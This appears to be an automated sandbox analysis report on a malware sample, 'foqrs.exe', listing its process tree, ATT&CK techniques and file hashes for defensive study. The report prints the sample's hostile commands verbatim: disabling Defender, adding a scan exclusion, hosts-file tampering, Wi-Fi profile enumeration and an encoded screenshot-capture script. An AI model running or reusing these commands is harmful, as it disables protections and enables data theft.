PID 432 wrote to memory of 5356	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	135
PID 432 wrote to memory of 5376	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	136
PID 432 wrote to memory of 5376	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	136
PID 5408 wrote to memory of 5468	5408	foqrs.exe	139
PID 5408 wrote to memory of 5468	5408	foqrs.exe	139
PID 432 wrote to memory of 5520	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	141
PID 432 wrote to memory of 5520	432	4e2b28e3-d647-12c6-249f-cd4838709b5d.exe	141
PID 5520 wrote to memory of 5652	5520	powershell.exe	142
PID 5520 wrote to memory of 5652	5520	powershell.exe	142
PID 5652 wrote to memory of 5688	5652	csc.exe	143
PID 5652 wrote to memory of 5688	5652	csc.exe	143
PID 5812 wrote to memory of 5872	5812	foqrs.exe	147
PID 5812 wrote to memory of 5872	5812	foqrs.exe	147

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1756	attrib.exe
4064	attrib.exe
5328	attrib.exe
5356	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://f.sed.lol/files/foqrs.exe
1⤵
PID:2948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4384,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:1
1⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3120,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:1
1⤵
PID:220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5356,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
1⤵
PID:4744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5360,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8
1⤵
PID:1680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6068,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6176 /prefetch:8
1⤵
PID:4276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6120,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:1
1⤵
PID:4852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6588,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
1⤵
PID:1624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=6660,i,3210801877307184477,8078594481454001567,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:8
1⤵
PID:4828

C:\Users\Admin\Downloads\foqrs.exe
"C:\Users\Admin\Downloads\foqrs.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:340
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
    C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
      4⤵
      Views/modifies file attributes
      PID:1756
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      4⤵
      Views/modifies file attributes
      PID:4064
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1892
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1612
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4828
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      PID:1892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4644
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3428
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5188
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5328
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5356
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5520
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5652
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7AD8.tmp" "c:\Users\Admin\AppData\Local\Temp\luzzq4jw\CSC4B4EAAADF269440D89AFABC5A0EFB6F.TMP"
        6⤵
        
        PID:5688

C:\Users\Admin\Downloads\foqrs.exe
"C:\Users\Admin\Downloads\foqrs.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
    C:\Users\Admin\AppData\Local\Temp\44f14b31-554a-300b-655e-fb6972dcc7bb.exe
    3⤵
    - Executes dropped EXE
    PID:3936

C:\Users\Admin\Downloads\foqrs.exe
"C:\Users\Admin\Downloads\foqrs.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
  2⤵
  PID:5204
- - C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
    C:\Users\Admin\AppData\Local\Temp\070f0fc0-6118-9d21-022e-8c239b4d0e3b.exe
    3⤵
    - Executes dropped EXE
    PID:5264

C:\Users\Admin\Downloads\foqrs.exe
"C:\Users\Admin\Downloads\foqrs.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5408
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
  2⤵
  PID:5468
- - C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
    C:\Users\Admin\AppData\Local\Temp\99cf3c46-b3c1-1eb4-0272-271a134746d5.exe
    3⤵
    - Executes dropped EXE
    PID:5500

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5756

C:\Users\Admin\Downloads\foqrs.exe
"C:\Users\Admin\Downloads\foqrs.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5812
- C:\Windows\system32\cmd.exe
  cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\1a255709-d337-6306-b4f5-829ba33fb3d8.exe
  2⤵
  PID:5872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fd98baf5a9c30d41317663898985593b

SHA1
ea300b99f723d2429d75a6c40e0838bf60f17aad

SHA256
9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

SHA512
bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\4e2b28e3-d647-12c6-249f-cd4838709b5d.exe

Filesize
9.9MB

MD5
1794788462c41d14e2659260f134a304

SHA1
e977afbac54e557b917abe2604eddee4c72fe297

SHA256
8f2f5de00ac8de98139e3c9a802bedae0368714ea3714eba37ef5778bff86a9d

SHA512
941d567e3316a4388d3554b14a1bf9af8254475811559b253dc9428b1e9c2de4d7d1f307fec9719b2c5968d3893d204d5d189fe312afe5913ff17572bbae2aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\BmbF6Os6u9\Display (1).png

Filesize
40KB

MD5
673704565f1113201582c3b0a75df94d

SHA1
ab2979a9aacaca9693689f7ae07c0db4d1314bc4

SHA256
7708f47e1efb7af4f55efd321cf3ad9184fc449882fb6b42a58cfe81ed2bad4d

SHA512
9d4d5d0fdc99ff3e97f679f88e01a7bf80698e4d15d45d99d48dc994212ffea3e029ab66470e42e31ef0ccb36960715265e870cd5a52b3cad044d3d4e8dacfdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7AD8.tmp

Filesize
1KB

MD5
0a234651b2ef6dad027359d3be2085e5

SHA1
6de3999afbdf7bf7a2623b30ab410c77f9d98c86

SHA256
9c777228c8ffb80643bec0e9be3f68fa9f18b8e86b254aac02b3a5c8360d41d7

SHA512
110a7298dd23989cc84323209baaa4642d97b2686ccaf2992b087c47ffdeed3a7b38e4130a3aa9b50407be82a321cac6f4550c48596807a53daf6880397c034d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjecowjo.aws.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.dll

Filesize
4KB

MD5
54ef1a54c6a268c12222590949ea2078

SHA1
2e273e40262c5180557c14b1896f3c7c24b78759

SHA256
5cd4a16d4347b70e3c23bbddc575b00088f9148f616357419ccb3321ab879242

SHA512
b93ab6549f504731b29189f9b385a6b0ad4675090d004a16c1024e202f41c1c135cf831e5e46763c2418a03ee3c62d305b182f135bde89a4dd724012d32918f8

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\CSC4B4EAAADF269440D89AFABC5A0EFB6F.TMP

Filesize
652B

MD5
0a9ecc3dca540bbb9c0b6e817c44cddd

SHA1
87251a5b459498edd2e2bc18c5490ffc4d68deea

SHA256
c6b00d6711746eb841aa26e1d73d9d8b7115dcd463dbd60bbd77f5a3f4dd85ad

SHA512
56492a51db6531dd565de378f779460198d14922c133fa8d4bba87cb75312c35f5376466b5b2c517400dce333aa83a995689ef06719aa0bb3acd326cd8d481cc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\luzzq4jw\luzzq4jw.cmdline

Filesize
607B

MD5
db18dfa93c2c83a1a551483af21d459f

SHA1
3f1a0d14c702332756b49919df49f4164b28a63f

SHA256
9fc64ec6a6d0642c8560f6fbe6f99ff36708e0fe189ebc00b08d602ef10fee45

SHA512
1368995c3328bfd3ed4754eb63b665e1ceb9f147afda9f4b177046d5c867ef593c2b527838afe01e6279dd7a9af3ab31d17dc71457cb37a86dc919477a91dbf3

Download Submit
memory/4828-12-0x000001BCF92C0000-0x000001BCF92E2000-memory.dmp

Filesize
136KB

Download
memory/5520-82-0x000001E7F9610000-0x000001E7F9618000-memory.dmp

Filesize
32KB

Download